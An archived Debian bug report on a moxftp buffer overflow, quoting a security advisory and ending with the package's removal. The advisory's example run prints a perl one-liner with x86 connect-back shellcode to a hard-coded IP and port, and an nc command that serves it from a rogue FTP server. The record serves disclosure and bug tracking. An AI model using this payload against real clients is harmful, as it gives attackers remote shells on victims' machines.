Bug#187481: marked as done (moxftp arbitrary code execution poc/advisory)
Your message dated Sun, 11 May 2003 20:40:55 +1000
with message-id <20030511104055.GA28727@regression.cyrius.com>
and subject line Removed
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 3 Apr 2003 18:37:11 +0000
>From joey@infodrom.org Thu Apr 03 12:37:11 2003
Return-path: <joey@infodrom.org>
Received: from luonnotar.infodrom.org [195.124.48.78]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 1919aG-0006ZD-00; Thu, 03 Apr 2003 12:37:08 -0600
Received: by luonnotar.infodrom.org (Postfix, from userid 10)
id 17264366B65; Thu, 3 Apr 2003 20:37:07 +0200 (CEST)
Received: at Infodrom Oldenburg (/\##/\ Smail-3.2.0.102 1998-Aug-2 #2)
from infodrom.org by finlandia.Infodrom.North.DE
via smail from stdin
id <m1919XV-000ohcC@finlandia.Infodrom.North.DE>
for submit@bugs.debian.org; Thu, 3 Apr 2003 20:34:17 +0200 (CEST)
Date: Thu, 3 Apr 2003 20:34:17 +0200
From: Martin Schulze <joey@infodrom.org>
To: submit@bugs.debian.org
Subject: moxftp arbitrary code execution poc/advisory
Message-ID: <20030403183417.GA32252@finlandia.infodrom.north.de>
References: <098401c2db77$91e06a70$24029dd9@tuborg>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <098401c2db77$91e06a70$24029dd9@tuborg>
User-Agent: Mutt/1.5.3i
Delivered-To: submit@bugs.debian.org
X-Spam-Status: No, hits=-6.1 required=4.0
tests=HAS_PACKAGE,IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,
SIGNATURE_SHORT_SPARSE,SPAM_PHRASE_00_01,SUPERLONG_LINE,
USER_AGENT,USER_AGENT_MUTT
version=2.44
X-Spam-Level:
Package: moxftp
Version: 2.2-18
Severity: grave
Tags: security
Unfortunately I am currently unable to discover the real problem
behind this potential exploit. I'm not even sure if it works
on Linux.
FreeBSD people simply marked this package FORBIDDEN, but didn't
fix the problem either. *sigh*
Regards,
Joey
Knud Erik Højgaard wrote:
> Attached document explains all.
>
> This document is also available from http://kokanins.homepage.dk
>
> --
> Knud
> I. BACKGROUND
>
> According to the vendor moxftp is a "Ftp shell under X Window System".
> /usr/ports/ftp/moxftp
>
> II. DESCRIPTION
>
> Insufficient bounds checking leads to execution of arbitrary code.
>
> III. ANALYSIS
>
> Upon parsing the '220 welcome to server' ftp banner a buffer can be
> overrun, allowing us to execute our arbitrary code. The buffer may be
> constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing
> the nops and shellcode in the buffer before ebp seems to cause some
> problems, luckily there's plenty of space after eip.
>
> Example run:
>
> $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" .. "\n"' > file
> # nc -l -p 21 < file
>
> This sets up a rogue server which will overflow the buffer, and execute
> the shellcode. The shellcode is connect-back to 217.157.2.36 port 10000,
> replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
>
> IV. DETECTION
>
> moxftp-2.2 shipping with the FreeBSD ports system as well as from
> various webpages per 9/2-03 is vulnerable.
>
> V. WORKAROUND
>
> unknown
>
> VI. VENDOR FIX
>
> unknown
>
> VII. CVE INFORMATION
>
> unknown
>
> VIII. DISCLOSURE TIMELINE
>
> unknown
>
> IX. CREDIT
>
> Knud Erik H?jgaard
>
--
Life is too short to run proprietary software. -- Bdale Garbee
Please always Cc to me when replying to me on the lists.
---------------------------------------
Received: (at 187481-done) by bugs.debian.org; 11 May 2003 10:41:40 +0000
>From tbm@cyrius.com Sun May 11 05:41:23 2003
Return-path: <tbm@cyrius.com>
Received: from bangpath.uucico.de [195.71.9.197]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 19EoGh-0005NM-00; Sun, 11 May 2003 05:41:23 -0500
Received: by bangpath.uucico.de (Postfix, from userid 10)
id D9D5926BC4; Sun, 11 May 2003 12:41:21 +0200 (CEST)
Received: by regression.cyrius.com (Postfix, from userid 1000)
id 4881323D48; Sun, 11 May 2003 20:40:55 +1000 (EST)
Date: Sun, 11 May 2003 20:40:55 +1000
From: Martin Michlmayr <tbm@cyrius.com>
To: 187481-done@bugs.debian.org
Subject: Removed
Message-ID: <20030511104055.GA28727@regression.cyrius.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Delivered-To: 187481-done@bugs.debian.org
X-Spam-Status: No, hits=-7.3 required=4.0
tests=BAYES_01,USER_AGENT_MUTT
version=2.53-bugs.debian.org_2003_05_09
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.53-bugs.debian.org_2003_05_09 (1.174.2.15-2003-03-30-exp)
This package has been removed from Debian unstable because it has been
orphaned for a very long time and nobody adopted it. See
http://lists.debian.org/debian-devel-announce/2003/debian-devel-announce-200304/msg00005.html
for more information.
--
Martin Michlmayr
tbm@cyrius.com
Reply to: